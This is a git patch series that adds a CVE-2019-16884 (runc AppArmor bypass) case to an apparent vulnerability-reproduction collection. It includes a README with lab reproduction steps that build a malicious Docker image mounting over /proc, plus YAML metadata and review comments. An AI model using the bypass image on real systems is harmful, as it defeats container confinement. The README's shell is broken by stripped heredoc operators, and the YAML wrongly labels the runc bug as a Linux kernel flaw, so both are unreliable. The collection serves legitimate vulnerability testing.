From f88f2d937de483f98b9421eb09cfe25aa361d239 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 06:32:59 +0000 Subject: [PATCH 01/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202019?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2019/.keep diff --git a/cve/linux-kernel/2019/.keep b/cve/linux-kernel/2019/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2d8a5c9f79ada0e3d722100a774b4e1d8e2058b7 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 06:33:18 +0000 Subject: [PATCH 02/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2019-16884?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2019/CVE-2019-16884/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2019/CVE-2019-16884/.keep diff --git a/cve/linux-kernel/2019/CVE-2019-16884/.keep b/cve/linux-kernel/2019/CVE-2019-16884/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 2a6db5423d027d5bcff024fc101bdcc72c9a695b Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 06:33:37 +0000 Subject: [PATCH 03/18] update cve/linux-kernel/2019/CVE-2019-16884/.keep. Signed-off-by: Hua --- cve/linux-kernel/2019/CVE-2019-16884/{.keep => ReadMe.md} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2019/CVE-2019-16884/{.keep => ReadMe.md} (100%) diff --git a/cve/linux-kernel/2019/CVE-2019-16884/.keep b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md similarity index 100% rename from cve/linux-kernel/2019/CVE-2019-16884/.keep rename to cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md -- Gitee From 9f1996e81e089055c852b06db2131dfeea2d5db1 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 06:54:27 +0000 Subject: [PATCH 04/18] update cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md. 
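Review bot: patches 01/18 through 03/18 only create `cve/linux-kernel/2019/.keep` and `cve/linux-kernel/2019/CVE-2019-16884/.keep` and then rename the latter to `ReadMe.md`; the placeholder files carry no content and the directory receives its real content in 04/18 anyway, so these three should be squashed into 04/18 (07/18, which deletes the first `.keep` again, disappears with them).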
Signed-off-by: Hua --- .../2019/CVE-2019-16884/ReadMe.md | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) diff --git a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md index e69de29b..0c8d3f42 100644 --- a/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md +++ b/cve/linux-kernel/2019/CVE-2019-16884/ReadMe.md @@ -0,0 +1,68 @@ +# CVE-2019-16884 + +PoC for CVE-2019-16884 +### 简介 +apparmor 可以让管理员通过程序的配置文件限制程序的功能,其本身作为一个内核模块集成在 Linux 内核中 +(可能发现 lsmod 里面并没有 apparmor,这是因为 lsmod 展示的是所有动态加载的内核模块, +通过 ls /sys/module/ 就可以看到所有的内核模块包括系统中内置的),因此其通过内核提供强访问控制。 + +CVE-2019-16884 可以使得用户绕过 apparmor 的一些策略进而可以实现一些提权操作。 + +``` +cat /sys/module/apparmor/parameters/enabled # 查看是否开启apparmor,返回为Y表示开启 +sudo cat /sys/kernel/security/apparmor/profiles # 查看加载的配置文件 +``` +### 构建实验环境 + +``` +> docker run -it ssst0n3/docker_archive:CVE-2019-16884 + +ubuntu login: root +Password: root +``` +### 漏洞复现 +#### 1、创建apparmor规则 + +``` +> cat > /etc/apparmor.d/no_flag < +profile no_flag flags=(attach_disconnected,mediate_deleted) { + #include + file, + deny /flag r, +} +EOF +``` + +#### 2、创建一个flag文件 +``` +echo "Al1ex is comming" > /tmp/flag +``` + +#### 3、应用规则 +``` +/sbin/apparmor_parser --replace --write-cache /etc/apparmor.d/no_flag +``` + +#### 4、检测,启动一个正常镜像此时无权限读取/flag内容3 +``` +docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag busybox cat /flag +``` + +#### 5、利用漏洞启用一个恶意镜像,可以读取/flag +``` +> mkdir -p rootfs/proc/self/{attr,fd} +> touch rootfs/proc/self/{status,attr/exec} +> touch rootfs/proc/self/fd/{4,5} +> cat < Dockerfile +FROM busybox +ADD rootfs / +VOLUME /proc +EOF +> docker build -t apparmor-bypass . +> docker run --rm --security-opt "apparmor=no_flag" -v /tmp/flag:/flag apparmor-bypass cat /flag +``` + +通过上述步骤即可完成漏洞的复现 + -- Gitee From c859ce072906d07765ea4f00bf504c1d39399146 Mon Sep 17 00:00:00 2001 
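Review bot: the shell in the reproduction steps of the added `ReadMe.md` will not run as pasted: `cat > /etc/apparmor.d/no_flag <` has lost its `<<EOF` heredoc operator (the closing `EOF` line is still there), the profile's `#include` directive has lost its target (presumably `<tunables/global>`, the standard include the rest of the profile relies on), and `cat < Dockerfile` in step 5 likewise needs `cat <<EOF > Dockerfile`; angle-bracketed text appears to have been stripped before commit, so please check the file in the repository rather than the web view. Smaller points in the same hunk: the step 4 heading ends in a stray `3`, `comming` should be `coming`, and the intro's statement that AppArmor is a kernel module (`内核模块`) sits oddly next to the same paragraph's observation that it never shows up in `lsmod`; AppArmor is a built-in LSM, and saying so directly is clearer. Since the README shows the bypass relying on an image that ships its own `/proc` tree (`VOLUME /proc`), a one-line remediation note (upgrade runc beyond 1.0.0-rc8, the affected version the YAML in 06/18 records) would give readers the mitigation next to the reproduction.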
From: Hua Date: Wed, 15 Mar 2023 06:54:57 +0000 Subject: [PATCH 05/18] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2019/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/linux-kernel/2019/yaml/.keep diff --git a/cve/linux-kernel/2019/yaml/.keep b/cve/linux-kernel/2019/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From f3c6b9b19b24845ee374efd4e32604ff246b3410 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 07:10:48 +0000 Subject: [PATCH 06/18] rename cve/linux-kernel/2019/yaml/.keep to cve/linux-kernel/2019/yaml/CVE-2019-16884. Add CVE-2019-6884 Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/.keep | 0 cve/linux-kernel/2019/yaml/CVE-2019-16884 | 20 ++++++++++++++++++++ 2 files changed, 20 insertions(+) delete mode 100644 cve/linux-kernel/2019/yaml/.keep create mode 100644 cve/linux-kernel/2019/yaml/CVE-2019-16884 diff --git a/cve/linux-kernel/2019/yaml/.keep b/cve/linux-kernel/2019/yaml/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884 b/cve/linux-kernel/2019/yaml/CVE-2019-16884 new file mode 100644 index 00000000..7a6d3a41 --- /dev/null +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884 
@@ -0,0 +1,20 @@ +id: CVE-2019-16884 +source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e +info: + name: linux kernel + severity: high + description: | + runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory + scope-of-influence: + Red Hat Enterprise Linux 8 + Red Hat Enterprise Linux 7 Extras + reference: + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 + - https://usn.ubuntu.com/usn/usn-4297-1 + - https://security.netapp.com/advisory/ntap-20220221-0004/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.5 + cve-id: CVE-2019-16884 + cwe-id: CWE-863 + tags: privilege escalation \ No newline at end of file -- Gitee From b7bc5e6c586726a5272121840a9b9761590026cf Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:45:03 +0000 Subject: [PATCH 07/18] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/linux-kernel/2019/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/linux-kernel/2019/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/linux-kernel/2019/.keep diff --git a/cve/linux-kernel/2019/.keep b/cve/linux-kernel/2019/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 7c6d439c40056218e468f711c2990697e52a5b82 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:47:02 +0000 Subject: [PATCH 08/18] rename cve/linux-kernel/2019/yaml/CVE-2019-16884 to cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml. Signed-off-by: Hua --- .../2019/yaml/{CVE-2019-16884 => CVE-2019-16884.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/linux-kernel/2019/yaml/{CVE-2019-16884 => CVE-2019-16884.yaml} (100%) 
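Review bot: in the new `CVE-2019-16884` file the entries under `scope-of-influence:` have no `- ` list markers, so a YAML parser folds `Red Hat Enterprise Linux 8` and `Red Hat Enterprise Linux 7 Extras` into one plain scalar instead of a list like the `reference:` block immediately below; prefix each entry with `- `. The `name: linux kernel` field also contradicts the `description:` two lines later, which places the bug in runc's `libcontainer/rootfs_linux.go` (the kernel enforces the AppArmor profile, but the mount-target check being bypassed is runc's), so filing the entry under `linux-kernel` will mislead anyone using this list to decide what to patch. `tags: privilege escalation` is likewise a loose fit for an entry whose own `cvss-metrics` record `C:N/I:H` and whose CWE is CWE-863 (incorrect authorization); a tag naming the AppArmor restriction bypass would describe it more precisely. Also worth fixing before merge: the file is created without an extension (renamed to `.yaml` only in 08/18, which could be squashed here), it has no trailing newline (`\ No newline at end of file`), and the commit message reads `Add CVE-2019-6884` for CVE-2019-16884.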
diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884 b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml similarity index 100% rename from cve/linux-kernel/2019/yaml/CVE-2019-16884 rename to cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml -- Gitee From a09e8ee80d0576ba54ee8183ce545ee5ac727ee6 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:52:45 +0000 Subject: [PATCH 09/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml. Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 7a6d3a41..0986572e 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -1,7 +1,7 @@ id: CVE-2019-16884 source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e info: - name: linux kernel + name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. severity: high description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory -- Gitee From 451245bf4e4f70526081b24f225334c2293e1d01 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:57:56 +0000 Subject: [PATCH 10/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 0986572e..6474da05 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml 
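Review bot: the replacement `name:` value in 09/18 is a full sentence (`Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.`) in a field that the other entries in the repository presumably treat as a short product name; explanatory text belongs in `description:`, and the product named should be runc, since the unchanged `description:` line in this same hunk attributes the bug to runc 1.0.0-rc8 and `libcontainer/rootfs_linux.go`. Suggest `name: runc`.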
@@ -7,7 +7,11 @@ info: runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory scope-of-influence: Red Hat Enterprise Linux 8 - Red Hat Enterprise Linux 7 Extras + Red Hat Enterprise Linux 7 Extras + Red Hat OpenShift Container Platform 4.1 + Red Hat OpenShift Container Platform 4.2 + Red Hat OpenShift Container Platform 3.9 + reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - https://usn.ubuntu.com/usn/usn-4297-1 -- Gitee From 91f7061bef1c0e518cfe3f2da45286a6f78c57a7 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:58:20 +0000 Subject: [PATCH 11/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 6474da05..59b3a07d 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -11,7 +11,6 @@ info: Red Hat OpenShift Container Platform 4.1 Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 - reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 - https://usn.ubuntu.com/usn/usn-4297-1 -- Gitee From baa2efb992582f695c63860ef03f30cc12949af8 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 08:58:42 +0000 Subject: [PATCH 12/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 59b3a07d..7d3322e7 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml 
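Review bot: in 10/18 the `- Red Hat Enterprise Linux 7 Extras` / `+ Red Hat Enterprise Linux 7 Extras` pair is textually identical, so the change can only be whitespace, and the three new OpenShift lines plus the extra blank line (removed again in 11/18) come with the same problem, which 12/18 then cleans up. The three commits should be squashed into one that adds the OpenShift entries cleanly, and the new entries still lack `- ` list markers, so the whole `scope-of-influence:` value remains a single folded scalar rather than a list.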
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -6,9 +6,9 @@ info: description: | runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory scope-of-influence: - Red Hat Enterprise Linux 8 - Red Hat Enterprise Linux 7 Extras - Red Hat OpenShift Container Platform 4.1 + Red Hat Enterprise Linux 8 + Red Hat Enterprise Linux 7 Extras + Red Hat OpenShift Container Platform 4.1 Red Hat OpenShift Container Platform 4.2 Red Hat OpenShift Container Platform 3.9 reference: -- Gitee From 5078807e52ed619e9bea4e07b91861302f23fba3 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 09:01:25 +0000 Subject: [PATCH 13/18] update openkylin_list.yaml Add CVE-2019-16884 Signed-off-by: Hua --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 5a8b7367..a4bb7ea0 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -19,6 +19,7 @@ cve: apache-tomcat: - CVE-2020-13935 linux-kernel: + - CVE-2019-16884 - CVE-2021-4204 - CVE-2021-22555 - CVE-2021-4154 -- Gitee From 7dc200fa688f7b826e466106b0f64ca3ff6eb5be Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 09:02:28 +0000 Subject: [PATCH 14/18] update openkylin_list.yaml Signed-off-by: Hua --- openkylin_list.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index a4bb7ea0..5a8b7367 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -19,7 +19,6 @@ cve: apache-tomcat: - CVE-2020-13935 linux-kernel: - - CVE-2019-16884 - CVE-2021-4204 - CVE-2021-22555 - CVE-2021-4154 -- Gitee From 69e614c976da49f33aebfe9a34a7dc0b20ea61ae Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 09:03:10 +0000 Subject: [PATCH 15/18] update other_list.yaml. Add CVE-2019-16884 
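Review bot: 13/18 adds `- CVE-2019-16884` under `linux-kernel:` in `openkylin_list.yaml` and 14/18 removes that very line, so the pair is a no-op and both should be dropped from the series; if the intent is that this CVE is not an openKylin case (15/18 adds it to `other_list.yaml`, whose header comment says it lists non-openKylin cases), the commit message of 15/18 could say so. The 12/18 hunk is the whitespace cleanup for 10/18 and belongs squashed there.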
Signed-off-by: Hua --- other_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/other_list.yaml b/other_list.yaml index eae3bac2..5d280333 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,6 +1,7 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: + - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 - CVE-2022-0995 -- Gitee From 21f50aa4dd72ab8547936a0b1d259c3ea7d54453 Mon Sep 17 00:00:00 2001 From: Hua Date: Wed, 15 Mar 2023 10:14:05 +0000 Subject: [PATCH 16/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml. Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 7d3322e7..7403b326 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -1,5 +1,5 @@ id: CVE-2019-16884 -source: https://github.com/Metarget/metarget/commit/f2718a1f4a71e8dd13d05231569119c54a23876e +source: None info: name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. severity: high @@ -20,4 +20,6 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16884 cwe-id: CWE-863 + cnvd-id: None + kve-id: None tags: privilege escalation \ No newline at end of file -- Gitee From f80d2b71e50de6bd47debc725c4eb5ea18e3fc99 Mon Sep 17 00:00:00 2001 From: Hua Date: Fri, 17 Mar 2023 02:04:08 +0000 Subject: [PATCH 17/18] =?UTF-8?q?update=20cve/linux-kernel/2019/yaml/CVE-2?= =?UTF-8?q?019-16884.yaml.=20=E6=9B=B4=E6=96=B0source?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index 7403b326..efe1dd0c 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml 
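Review bot: 16/18 sets `source: None` and adds `cnvd-id: None` and `kve-id: None`; in YAML `None` is the string `"None"`, not a null, so any tool consuming these fields will see a bogus identifier. Use `null`, `~`, or an empty value unless the repository's other entries deliberately use the string `None` (not visible here, so worth confirming). Replacing a concrete `source:` URL with `None` only to change it again in 17/18 and 18/18 is also churn; squash the three into one commit carrying the final value.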
+++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -1,5 +1,5 @@ id: CVE-2019-16884 -source: None +source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 info: name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. severity: high -- Gitee From 363aef64f34bbd0ed1cff0eaaaa3d07283d17905 Mon Sep 17 00:00:00 2001 From: Hua Date: Fri, 17 Mar 2023 08:41:13 +0000 Subject: [PATCH 18/18] update cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml. Signed-off-by: Hua --- cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml index efe1dd0c..0f38b714 100644 --- a/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml +++ b/cve/linux-kernel/2019/yaml/CVE-2019-16884.yaml @@ -1,5 +1,5 @@ id: CVE-2019-16884 -source: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884 +source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md info: name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux. severity: high -- Gitee
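Review bot: the `source:` field ends the series pointing at a pinned copy of a third-party wiki page (`teamssix/TWiki`), after having been the MITRE record in 17/18 and the Metarget commit in 06/18. A secondary write-up is a fine reference, but `source` reads as the authoritative origin; the upstream runc advisory or fix commit is the better value, with the wiki page moved into the `reference:` list next to the MITRE, Ubuntu and NetApp links already there.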